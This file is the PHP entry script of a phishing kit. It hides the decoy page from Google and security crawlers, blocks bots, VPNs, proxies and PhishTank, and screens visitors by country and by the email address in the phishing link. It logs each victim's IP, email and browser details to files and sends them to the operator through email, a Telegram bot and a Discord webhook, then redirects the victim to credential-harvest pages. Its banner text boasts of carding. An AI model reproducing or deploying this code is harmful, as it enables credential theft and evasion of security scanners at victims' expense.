<?php
ob_start();
session_start();
$path = "./site/";
require ("DheReckahConfi/Guration.php");
require ("DheReckahConfi/Function.php");
require ("DheReckahDecline/AntiBotIp.php");
require ("DheReckahDecline/AntiBotPw.php");
require ("DheReckahDecline/AntiBotKillBot.php");
require ("DheReckahDecline/AntiBotUserAgent.php");
require ("DheReckahDecline/AntiBotIsp.php"); 
require ("DheReckahDecline/AnitiBotHost.php");
require ("DheReckahDecline/AntiBotPhishTank.php");
require ("DheReckahDecline/AntiBotVpn.php");
require ("DheReckahDecline/AntiBotProxy.php");
require ("DheReckahDecline/AntBotProtection.php");
require ("DheReckahDecline/SaveBrowsing.php");
require ("DheReckahDecline/DiscoveredBot.php");
require ("DheReckahDecline/AntiBotThree.php");
require ("DheReckahDecline/DisturbOne.php");
require ("DheReckahDecline/DisturbTwo.php");
require("DheReckahDecline/Anti/Bot-Crawler.php");
@require("DheReckahDecline/Anti/Crawler/src/CrawlerDetect.php");
use JayBizzle\CrawlerDetect\CrawlerDetect;
if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { include($path."index.php"); exit(); }
if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) { include($path."index.php"); exit(); }

$rand = generateRandomString(130);
$ip = getIp();
$Allvisitor = dataVisitor($ip)."\n";
$_SESSION['ipFullData'] = $Allvisitor;
$AllvisitorFile = fopen("DheReckahHost/Fishes/4ll.html","a");
fwrite($AllvisitorFile,$Allvisitor);
fclose($AllvisitorFile);
/* Get info */
$ip = getIp();
$data = GetData();
$city = $data['city'];
$country = $data['country'];
$Currency = $data['Currency'];
$Country_code = $data['Country_code'];
// Start Session 
$_SESSION["ip"] = $ip;
$_SESSION["country"] = $country;
$_SESSION["currency"] = $Currency;
$_SESSION["Country_code"] = $Country_code;
$countryBlock =strtolower($countryBlock);
$allowdCountry = strtolower($allowdCountry);
if ($countryBlock == "true") {
	if(countryLock(strtolower($Country_code),$allowdCountry) ==false and $ip != $yourIPCountry ){
		include($path."index.php");exit();
		echo "country";

	}
}



$redirect = strtolower($redirect);
$redirectFrom = strtolower($redirectFrom);
if ($redirect == "true") {
	if(checkRedirect($redirectFrom) == false ){
		include($path."index.php");exit();
		echo "redirectFrom";

	}
}

$listSent = strtolower($listSent);
if ($listSent == "true") {
	if (isset($_GET['email'])) {
			$email = bs2EmailGrabber($_GET['email']);
		if (filter_var($email, FILTER_VALIDATE_EMAIL)) {
			if ( CheckEmail($email) == false) {
				include($path."index.php");exit();
			}else{
				$_SESSION['emailGrabber'] = $email;
				$file = fopen("visitors/emails.txt","w");
				fwrite($file, $email);
				fclose($file);
			}
		}
	}else{
		echo "listSent";
		include($path."index.php");exit();
	}
}
$accessOneTime = strtolower($accessOneTime);
if ($accessOneTime == "true") {
	$email = bs2EmailGrabber($_GET['email']);
	if (isset($email)) {
		if (filter_var($email, FILTER_VALIDATE_EMAIL)) {
						// echo accessOneTime($email);

			if (accessOneTime($email) == false and $email != $yourEmailGrabber) {
				include($path."index.php");exit();
				echo "emailAccess";

			}else{
				$file = fopen("DheReckahGrabber/emailListGrabber.txt","a");
				fwrite($file,$email."\n");
				fclose($file);
			}
		}
	}else{
		include($path."index.php");exit();
		echo "emailGrabberAcc";

		
	}
}


$accessOneTimeIp = strtolower($accessOneTimeIp);
if ($accessOneTimeIp == "true") {
	$ip = $_SESSION["ip"];
	$AllowedIp = $yourIPAceess;
	if (accessOneTimeIP($ip) == false and $ip != $AllowedIp) {
		include($path."index.php");exit();
		echo "ip";
	}else{
		$file = fopen("DheReckahGrabber/DiscoveredIp.txt","a");
		fwrite($file,$ip."\n");
		fclose($file);
	}
}

//here
$LogginIp = $_SESSION['ipFullData'];
$sessionIp = fopen("DheReckahHost/Fishes/4ll0w3d.html","a+");
fwrite($sessionIp,"$LogginIp"); 
fclose($sessionIp);
$telegramMsg ="
[Dh3 R3ck4h B0y B0rn D3m ❤️😜❤️
[0r Th3y D0nt T3ll Y0u ❤️😜❤️
[C0me 0n C4rd!nG F0r D4t0r ❤️😜❤️
[".$YourName." M&T ❤️😜❤️
[N3w L0g!n Us3r 1p H4s B3en
[Fi5h|👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟"."
[👤L0g!n Us3r 1P|👉 ".$_SESSION['ipFullData']."[🌐Br0ws3r👉".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])."".";
[👤Us3r Ag3nt|👉 ".($_SERVER['HTTP_USER_AGENT'])."";

$discordMsg ="
[Dh3 R3ck4h B0y B0rn D3m ❤️😜❤️
[0r Th3y D0nt T3ll Y0u ❤️😜❤️
[C0me 0n C4rd!nG F0r D4t0r ❤️😜❤️
[".$YourName." M&T ❤️😜❤️
[N3w L0g!n Us3r 1p H4s B3en
[Fi5h|👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟"."
[👤L0g!n Us3r 1P|👉 ".$_SESSION['ipFullData']."[🌐Br0ws3r|👉".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])."".";
[👤Us3r Ag3nt|👉 ".($_SERVER['HTTP_USER_AGENT'])."";

          $Subject .= "[Dh3 R3ck4h B0y B0rn D3m ❤️😜❤️ \n";
          $Subject .= "[0r Th3y D0nt T3ll Y0u ❤️😜❤️ \n";
          $Subject .= "[C0me 0n C4rd!nG F0r D4t0r ❤️😜❤️ \n";
          $Subject .= "[".$YourName." ".$PageName."❤️😜❤️ \n";
          $Subject .= "|| N3w L0g!n U3er 1p H4s B3en F!5h👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟||\n";
          $Subject .= "|| 👤N3w L0g!n U3er 1P 👉 ".$_SESSION['ipFullData']."|| 🌐Browser👉".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])."";
          $headers .= "MIME-Version: 1.0" . "\r\n";
          $headers .= "From: ".$Owner.".$DheReckahServer." . "\r\n";
          $headers .= "Content-type:text/plan;charset=UTF-8" . "\r\n";
          $msg .= "[".$YourName." ".$PageName." || \n";
          $msg .= "[N3w L0g!n Us3r 1p H4s B3en ||\n";
          $msg .= "[F!5h👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟  ||\n";
          $msg .= "[👤Em4!lAcc3s5      : ".$_POST['emailaccess']." ||\n";
          $msg .= "[👤L0g!n Us3r!P 👉 ".$_SESSION['ipFullData']."[🌐Browser👉".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])." ||";
          $msg .= "[👤U3er Ag3nt    : ".($_SERVER['HTTP_USER_AGENT'])." ||\n";
          
    

if ($sendToEmail == "true") {
    $DheReckahCoded = array(
        'msg' => $msg,
        'headers' => $headers,
        'Subject' => $Subject,
    );
    echo json_encode($DheReckahCoded);
        
        send($yourEmail, $Subject, $msg,$headers);

      }
      
if ($sendToTelegramBot == "true") { 
    $DheReckahCoded = array(
        'telegramMsg' => $telegramMsg,
        'discordMsg' => $discordMsg,
    );
    echo json_encode($DheReckahCoded);
        send($telegramMsg,$botToken,$chatId);

      
 $DheReckahApi="https://api.telegram.org/bot".$botToken;
  $sendToTelegramBot=[
      'chat_id'=> urlencode($chatId),
      'text'=> $telegramMsg,
  ];
  $ch = curl_init($DheReckahApi . '/sendMessage');
  curl_setopt($ch, CURLOPT_HEADER, false);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, ($sendToTelegramBot));
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  $answer = curl_exec($ch);
  curl_close($ch);
 
     } 
 if ($sendToDiscordBot == "true"){
     $DheReckahCoded = array(
        'discordMsg' => $discordMsg,
    );
    echo json_encode($DheReckahCoded);
    $DheReckahApi = $webHookUrl; 
    $json_data = array ('content'=>"$discordMsg");
    $make_json = json_encode($json_data);
    $ch = curl_init( $DheReckahApi );
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-type: application/json'));
    curl_setopt($ch, CURLOPT_POSTFIELDS, $make_json);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $answer = curl_exec($ch);
}    
      

if ($show_attempt_Page == "true") {
		     $_SESSION['Dh3R3ck4h_SESSION_T0k3n'] = $Dh3R3ck4h_SESSION_T0k3n;
		     header("Location: ./$priv8=".$Country_code);exit();			

		}

$emailGrabber = strtolower($emailGrabber);
if ($emailGrabber =="true") {
	$email = bs2EmailGrabber($_GET['email']);
	if (isset($email) or filter_var($email, FILTER_VALIDATE_EMAIL)) {
		$_SESSION['emailaccess'] = $email;
	$_SESSION['Dh3R3ck4h_SESSION_T0k3n'] = $Dh3R3ck4h_SESSION_T0k3n;
	header("Location: ./$priv6=".$Country_code);exit();
	}else{
		include($path."index.php");exit;
    exit;
		echo "emailaccess";

	}
}else{
$_SESSION['Dh3R3ck4h_SESSION_T0k3n'] = $Dh3R3ck4h_SESSION_T0k3n;
header("Location: ./$priv6=".$Country_code);
exit();
}
?>